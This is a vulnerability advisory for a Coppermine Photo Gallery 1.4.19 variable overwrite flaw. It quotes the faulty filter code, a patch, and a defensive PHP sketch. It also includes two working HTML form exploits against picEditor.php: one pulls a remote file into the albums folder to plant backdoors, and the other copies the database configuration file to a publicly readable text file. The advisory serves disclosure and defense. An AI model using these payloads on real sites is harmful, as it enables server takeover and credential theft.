Coppermine Photo Gallery Variable Overwrite Vulnerability
Release date: 2009-01-30
Updated: 2009-02-01
Affected systems:
Coppermine Photo Gallery 1.x
Description:
Coppermine Photo Gallery
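Coppermine is a multi-purpose integrated web picture gallery script written in PHP.
Coppermine Photo Gallery has a flaw in how it handles user request data; a remote attacker could exploit it to upload PHP script files and take control of the application.
The include/init.inc.php script mishandles global variables when filtering them, which lets a remote attacker bypass the security restriction and upload arbitrary script files to achieve command execution. Exploiting this vulnerability requires the register_globals option to be enabled in the system's PHP configuration.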
<*Source: Michael Brooks
*>
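Test method:
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!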
Special thanks to str0ke!
Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057 downloads from sf.net!
For this attack we need register_globals=on . The problem is that
the anti-register_globals security can be bypassed.
This is in /include/init.inc.php starting on line 42:
    $keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
    //...
    if (is_array($_POST)) {
        foreach ($_POST as $key => $value) {
            if (!is_array($value))
                $_POST[$key] = strtr($value, $HTML_SUBST);
            if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
        }
    }
    if (is_array($_GET)) {
        foreach ($_GET as $key => $value) {
            unset($_GET[$key]);
            $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
            if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
        }
    }
    if (is_array($_COOKIE)) {
        foreach ($_COOKIE as $key => $value) {
            if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
        }
    }
    if (is_array($_REQUEST)) {
        foreach ($_REQUEST as $key => $value) {
            if (!is_array($value))
                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
            if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
        }
    }
    //...
Here is a patch that will take care of register_globals.
    // The option name must be passed to ini_get() as a quoted string.
    if (ini_get('register_globals')) {
        foreach (get_defined_vars() as $var => $val) {
            // Only keep the superglobals we need on this whitelist; _SESSION will take care of itself:
            if (!in_array($var, array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))) {
                unset($$var);
            }
        }
    }
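The filter quoted from init.inc.php decides what to delete by consulting $keysToSkip, a global that the same loop will unset when a request carries a key named keysToSkip. As an added example (not Coppermine's code and not the advisory author's patch), the sketch below keeps the protected list in a constant and all working state inside a function, so request keys cannot remove either. scrub_request_globals(), PROTECTED_NAMES and the sample request values are hypothetical, and register_globals is emulated because it was removed in PHP 5.4.

```php
<?php
// Added example, not Coppermine code. scrub_request_globals(), PROTECTED_NAMES
// and the request below are hypothetical and constructed for illustration.

// A constant cannot be unset or overwritten by a request key of the same name.
const PROTECTED_NAMES = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                         '_SERVER', '_FILES', '_ENV', '_SESSION'];

/**
 * Remove every global whose name appears as a key in the given request arrays.
 * $sources is passed by value, so the keys are snapshotted before anything is
 * unset, and the loop state is function-local rather than global.
 */
function scrub_request_globals(array $sources): array
{
    $removed = [];
    foreach ($sources as $source) {
        foreach (array_keys($source) as $key) {
            $key = (string) $key;
            if (in_array($key, PROTECTED_NAMES, true)) {
                continue;                 // never delete a superglobal by name
            }
            if (array_key_exists($key, $GLOBALS)) {
                unset($GLOBALS[$key]);    // drop the request-injected global
                $removed[] = $key;
            }
        }
    }
    return $removed;
}

// Constructed request using the same key names as the forms on this page.
$get  = ['img_dir' => 'constructed-value', 'CURRENT_PIC' => ['filename' => 'constructed-value']];
$post = ['save' => '1', 'keysToSkip' => '1', '_GET' => '1', '_REQUEST' => '1'];

// Emulate register_globals=On by copying request keys into the global scope.
foreach ($get + $post as $name => $value) {
    if (!in_array($name, PROTECTED_NAMES, true)) {
        $GLOBALS[$name] = $value;
    }
}

$removed = scrub_request_globals([$get, $post]);
sort($removed);
echo "removed: ", implode(', ', $removed), "\n";
// Request-named globals are gone; the superglobal arrays are still intact.
var_dump(isset($img_dir), isset($CURRENT_PIC), isset($keysToSkip), is_array($_GET));
```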
These 2 exploits are written in HTM, but they are NOT XSRF! This is
a global variable manipulation issue, you can exploit this with CURL
or whatever.
This will copy www.google.com to
http://127.0.0.1/cpg1419/albums/test.php . This is very useful for
uploading backdoors.
This is hijacking a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
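Recommendations:
Workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:
* Disable the register_globals option in the system's PHP configuration.
Vendor patch: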
Coppermine
----------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.chezgreg.net/coppermine/
